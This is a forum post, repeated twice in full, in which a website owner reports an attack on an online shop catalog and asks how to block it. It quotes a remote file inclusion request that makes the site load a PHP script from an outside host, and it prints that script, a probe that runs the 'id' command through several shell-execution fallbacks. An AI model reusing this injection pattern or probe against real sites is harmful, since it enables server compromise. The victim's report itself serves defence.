Being Hacked
Posted: Sun Jul 12, 2009 12:29 pm
Hello all.
I Got hacked last night from Korea Republic ip 210.205.57.2. Browser: libwww-perl/5.79
This was a Bookmark entry and the landing page was:
myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???
Landing page should be this:
myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de
without the following:
///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???
When I point my browser to:
samjinenginc.com/board/readme.txt???
the below script shows. After this, the next stats entry does not show only this error blocking the ip and country addresses:
Warning: gethostbyaddr() [function.gethostbyaddr]: Address is not in a.b.c.d form in /www/myhomepage.com/web/catalog/admin/supertracker.php on line 549
After this entry, all other enties are normal.
Not sure as to the total function of this script, but it appears to be blocking me from getting certain ip addresses, and country information. Is there a way to block this script?
This also blocked my other tracking scripts.
1. | <?php
2. | echo "Mic22";
3. | $cmd="id";
4. | $eseguicmd=ex($cmd);
5. | echo $eseguicmd;
6. | function ex($cfe){
7. | $res = '';
8. | if (!empty($cfe)){
9. | if(function_exists('exec')){
10. | @exec($cfe,$res);
11. | $res = join("\n",$res);
12. | }
13. | elseif(function_exists('shell_exec')){
14. | $res = @shell_exec($cfe);
15. | }
16. | elseif(function_exists('system')){
17. | @ob_start();
18. | @system($cfe);
19. | $res = @ob_get_contents();
20. | @ob_end_clean();
21. | }
22. | elseif(function_exists('passthru')){
23. | @ob_start();
24. | @passthru($cfe);
25. | $res = @ob_get_contents();
26. | @ob_end_clean();
27. | }
28. | elseif(@is_resource($f = @popen($cfe,"r"))){
29. | $res = "";
30. | while(!@feof($f)) { $res .= @fread($f,1024); }
31. | @pclose($f);
32. | }}
33. | return $res;
34. | }
35. | exit;
Thanks
I Got hacked last night from Korea Republic ip 210.205.57.2. Browser: libwww-perl/5.79
This was a Bookmark entry and the landing page was:
myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???
Landing page should be this:
myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de
without the following:
///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???
When I point my browser to:
samjinenginc.com/board/readme.txt???
the below script shows. After this, the next stats entry does not show only this error blocking the ip and country addresses:
Warning: gethostbyaddr() [function.gethostbyaddr]: Address is not in a.b.c.d form in /www/myhomepage.com/web/catalog/admin/supertracker.php on line 549
After this entry, all other enties are normal.
Not sure as to the total function of this script, but it appears to be blocking me from getting certain ip addresses, and country information. Is there a way to block this script?
This also blocked my other tracking scripts.
1. | <?php
2. | echo "Mic22";
3. | $cmd="id";
4. | $eseguicmd=ex($cmd);
5. | echo $eseguicmd;
6. | function ex($cfe){
7. | $res = '';
8. | if (!empty($cfe)){
9. | if(function_exists('exec')){
10. | @exec($cfe,$res);
11. | $res = join("\n",$res);
12. | }
13. | elseif(function_exists('shell_exec')){
14. | $res = @shell_exec($cfe);
15. | }
16. | elseif(function_exists('system')){
17. | @ob_start();
18. | @system($cfe);
19. | $res = @ob_get_contents();
20. | @ob_end_clean();
21. | }
22. | elseif(function_exists('passthru')){
23. | @ob_start();
24. | @passthru($cfe);
25. | $res = @ob_get_contents();
26. | @ob_end_clean();
27. | }
28. | elseif(@is_resource($f = @popen($cfe,"r"))){
29. | $res = "";
30. | while(!@feof($f)) { $res .= @fread($f,1024); }
31. | @pclose($f);
32. | }}
33. | return $res;
34. | }
35. | exit;
Thanks